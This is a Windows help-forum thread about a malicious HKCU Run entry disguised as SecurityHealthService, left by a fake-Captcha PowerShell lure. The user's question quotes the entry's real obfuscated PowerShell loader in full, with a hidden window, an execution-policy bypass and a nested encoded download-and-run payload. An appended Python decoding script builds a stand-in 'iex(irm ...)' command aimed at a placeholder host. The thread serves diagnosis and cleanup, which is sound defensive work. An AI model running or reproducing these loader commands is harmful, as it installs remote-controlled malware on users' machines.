Is SecurityHealthService supposed to be in HKEY_CURRENT_USER?

Isaac Chan 0 Reputation points
2026-04-25T15:58:39.7433333+00:00

I recently came across a website that prompts you to run something with PowerShell with a fake Captcha. When the terminal opened, I misclicked and ran the script instead. After that, every time I boot up my laptop (Asus Vivobook S14 running on Windows 11), a PowerShell pops up and disappears immediately. I've done everything else, Microsoft Defender scan, MalwareBytes, installing McAfee, checking Task Manager, Task Scheduler, and a bunch of Sysinternals. I could not identify anything that's suspicious, at least not to me.

So I did a little digging and ended up checking the Registry Editor. Under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, I found something called the SecurityHealthService with a value data of

powershell -w h -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaAAnACwAJwAtAGUAcAAnACwAJwBiAHkAcABhAHMAcwAnACwAJwAtAGUAbgBjACcALAAnAGQAQQBCAHkAQQBIAGsAQQBlAHcAQgBwAEEARwBVAEEAZQBBAEEAbwBBAEcAawBBAGMAZwBCAHQAQQBDAEEAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEgATQBBAE8AZwBBAHYAQQBDADgAQQBhAEEAQgBoAEEARwAwAEEAYQBRAEIAbABBAEcAMABBAGEAUQBCAGwAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEATAB3AEIANABBAEUARQBBAGUAUQBBAHcAQQBIAEEAQQBkAGcAQQAwAEEARwB3AEEAUAB3AEIAMABBAEQAMABBAFEAZwBCAGoAQQBFAFkAQQBWAHcAQgBsAEEARQBnAEEAYwBnAEEAeABBAEYAQQBBAGUAQQBCAGkAQQBEAE0AQQBiAGcAQgBrAEEARgBnAEEATABRAEIAbQBBAEYAYwBBAFUAZwBBAHQAQQBGADgAQQBVAFEAQQBuAEEAQwBrAEEAZgBRAEIAagBBAEcARQBBAGQAQQBCAGoAQQBHAGcAQQBlAHcAQgB6AEEARwB3AEEAWgBRAEIAbABBAEgAQQBBAEkAQQBBAHgAQQBEAHMAQQBhAFEAQgBsAEEASABnAEEASwBBAEIAcABBAEgASQBBAGIAUQBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBZAFEAQgB0AEEARwBrAEEAWgBRAEIAdABBAEcAawBBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAZQBBAEIAQgBBAEgAawBBAE0AQQBCAHcAQQBIAFkAQQBOAEEAQgBzAEEARAA4AEEAZABBAEEAOQBBAEUASQBBAFkAdwBCAEcAQQBGAGMAQQBaAFEAQgBJAEEASABJAEEATQBRAEIAUQBBAEgAZwBBAFkAZwBBAHoAQQBHADQAQQBaAEEAQgBZAEEAQwAwAEEAWgBnAEIAWABBAEYASQBBAEwAUQBCAGYAQQBGAEUAQQBKAHcAQQBwAEEASAAwAEEATwB3AEIAcABBAEgASQBBAGIAUQBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBZAFEAQgB0AEEARwBrAEEAWgBRAEIAdABBAEcAawBBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAZQBBAEIAQgBBAEgAawBBAE0AQQBCAHcAQQBIAFkAQQBOAEEAQgBzAEEARAA4AEEAYwB3AEEAOQBBAEQASQBBAEoAZwBCAHcAQQBEADAAQQBNAFEAQQBtAEEASABRAEEAUABRAEIAQwBBAEcATQBBAFIAZwBCAFgAQQBHAFUAQQBTAEEAQgB5AEEARABFAEEAVQBBAEIANABBAEcASQBBAE0AdwBCAHUAQQBHAFEAQQBXAEEAQQB0AEEARwBZAEEAVgB3AEIAUwBBAEMAMABBAFgAdwBCAFIAQQBDAGMAQQBmAEEAQgBwAEEARwBVAEEAZQBBAEEAPQAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=

Now what I don't know is if it's supposed to be there. From other forums, it says it's supposed to be in HKEY_LOCAL_MACHINE instead and it should not run PowerShell. But I'm not familiar with PowerShell and I would really want a second opinion.

Windows for home | Windows 11 | Security and privacy
2 answers

  1. Ramesh Srinivasan 81,160 Reputation points Independent Advisor
    2026-04-25T16:43:34.5166667+00:00

    Hi Isaac,

    It's malicious code. Please delete the SecurityHealthService entry.

    Also, share your Farbar scan logs.

    • Download Farbar Recovery Scan Tool 64-bit FRST64.exe
    • If the OS language is not English, rename FRST64.exe to FRST64English.exe.
    • Run the program. Don't check or uncheck any options. Click "Scan".
    • Add the two logs, FRST.txt and Addition.txt, to a zip archive.
    • Share the zip file on OneDrive or GoFile.io, and post the link here.

    Note: If Microsoft Edge or Chrome mislabels the Farbar Scanner executable as PUA/malware, choose to keep it by tapping … in the bottom bar, choosing Keep, and then choosing Keep anyway in the dialog that appears. See this screenshot. It's a safe tool used in most antimalware forums.


    Standard Disclaimer: There is a link to a non-Microsoft website. The page appears to provide accurate, safe information. Watch out for ads on the site that may advertise products frequently classified as PUPs (Potentially Unwanted Products). Thoroughly research any product advertised on the site before you decide to download and install it.

    1 person found this answer helpful.

  2. AI answer

    2026-04-25T15:58:53.52+00:00

    SecurityHealthService should not be starting PowerShell from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. That entry is almost certainly malicious persistence created by the script that ran from the fake Captcha site.

    Legitimate Windows security components work differently:

    • Windows Security uses the Windows Security Service (SecurityHealthService / Windows Security Health Service), which in turn uses the Windows Security Center Service (wscsvc). These are normal Windows services, not per-user Run entries, and they do not launch PowerShell at logon.
    • The Windows Security Center Service (wscsvc) lives under the services registry path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc, not under HKCU\...\Run.
    • Disabling or modifying these services affects reporting of security status, but they still do not rely on a PowerShell -ExecutionPolicy Bypass or -enc (encoded command) style startup.

    The value you found:

    • Runs powershell with -w h (hidden window) and -enc (base64-encoded command), which is a common malware pattern to hide what the script is doing.
    • Is stored under the current user’s Run key, which is a standard persistence mechanism for malware.

    Additionally, Windows guidance explicitly warns that services and security components are defined under HKEY_LOCAL_MACHINE service keys, and that incorrect or unexpected registry entries can indicate corruption or tampering.

    Given all of this, that SecurityHealthService value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run is not normal and should be treated as malicious. Removing that Run entry and then rechecking the system (including the real wscsvc service key under HKLM\SYSTEM\CurrentControlSet\services\wscsvc) is appropriate. If issues with Windows Security persist, follow the documented steps for repairing the wscsvc registry key and be sure to back up the registry before making changes.

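    The value quoted in the question and the indicators listed in the AI answer (hidden window, -enc, execution-policy bypass, a per-user Run key) can be checked without ever executing the command: PowerShell's -EncodedCommand argument is just base64 over UTF-16LE text, and the Start-Process wrapper used here carries a second -enc payload inside the first. The following Python script is an added example, not code from the question, the answers, or Microsoft. It unwraps nested -enc layers, flags the usual persistence indicators, and extracts any URLs for blocklisting. The Run entries, the inner command and its URL are constructed for this example (example.invalid is a reserved, non-routable name); to inspect a real entry, export the value with `reg query` or Registry Editor and pass the string to `audit_run_entry`.

```python
import base64
import re

# --- Constructed sample standing in for an exported HKCU\...\Run key ---------
# The first entry mirrors the shape of the value in the question: an outer
# "powershell -w h -enc <b64>" whose decoded text is a Start-Process wrapper
# carrying a second -enc payload. The inner command and URL are made up.
def _enc(command: str) -> str:
    """Encode text the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

INNER_COMMAND = "iex(irm 'https://c2.example.invalid/stage?t=CONSTRUCTED')"
OUTER_COMMAND = (
    "Start-Process powershell -ArgumentList '-w','h','-ep','bypass','-enc','"
    + _enc(INNER_COMMAND) + "' -WindowStyle Hidden"
)
SAMPLE_RUN_ENTRIES = {
    "SecurityHealthService": "powershell -w h -enc " + _enc(OUTER_COMMAND),
    # A benign-looking entry for contrast (constructed path).
    "OneDrive": '"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
}

# -e / -ec / -enc / -encodedcommand followed by a base64 blob, in either the
# plain "-enc XXX" form or the Start-Process "'-enc','XXX'" form.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s|,)['\"]?-e(?:c|nc|ncodedcommand)?['\"]?[\s,]+['\"]?([A-Za-z0-9+/=]{16,})"
)
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b|['\"]-w['\"],\s*['\"]h['\"]"),
    "execution_policy_bypass": re.compile(r"(?i)-e(?:p|xecutionpolicy)\b.{0,6}bypass"),
    "encoded_command": ENC_FLAG,
    "download_and_run": re.compile(
        r"(?i)\b(?:iex|invoke-expression)\b.*\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
    ),
}
URL = re.compile(r"(?i)https?://[^\s'\"]+")


def decode_encoded_command(b64: str) -> str:
    """Reverse PowerShell's -EncodedCommand encoding (base64 of UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")


def unwrap_layers(command: str, max_depth: int = 5) -> list[str]:
    """Return the command plus each nested -enc payload decoded, outermost first.

    Nothing is executed; malformed base64 simply ends the unwrapping.
    """
    layers = [command]
    for _ in range(max_depth):
        m = ENC_FLAG.search(layers[-1])
        if not m:
            break
        try:
            layers.append(decode_encoded_command(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            break
    return layers


def audit_run_entry(name: str, command: str) -> dict:
    """Decode all layers of a Run value and report persistence indicators."""
    layers = unwrap_layers(command)
    findings = {key: any(rx.search(layer) for layer in layers) for key, rx in INDICATORS.items()}
    urls = sorted({u for layer in layers for u in URL.findall(layer)})
    launches_powershell = bool(re.search(r"(?i)\bpowershell(?:\.exe)?\b|\bpwsh\b", command))
    # A Run entry that starts PowerShell with a hidden window, an encoded
    # command or a policy bypass is the pattern the answers above describe.
    suspicious = launches_powershell and (
        findings["encoded_command"] or findings["hidden_window"] or findings["execution_policy_bypass"]
    )
    return {
        "name": name,
        "layers": len(layers),
        "launches_powershell": launches_powershell,
        "urls": urls,
        "suspicious": suspicious,
        **findings,
    }


if __name__ == "__main__":
    for entry_name, cmd in SAMPLE_RUN_ENTRIES.items():
        report = audit_run_entry(entry_name, cmd)
        print(f"{entry_name}: suspicious={report['suspicious']} layers={report['layers']} urls={report['urls']}")
        for depth, layer in enumerate(unwrap_layers(cmd)):
            print(f"  layer {depth}: {layer[:90]}")
```

    The decoded layers are only printed, never run; the URLs that fall out are what you would hand to a web filter or compare against threat-intelligence feeds, and the Run value name is what you would search for in other autostart locations (HKLM Run, RunOnce, the Startup folder, scheduled tasks) before concluding the cleanup is complete.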
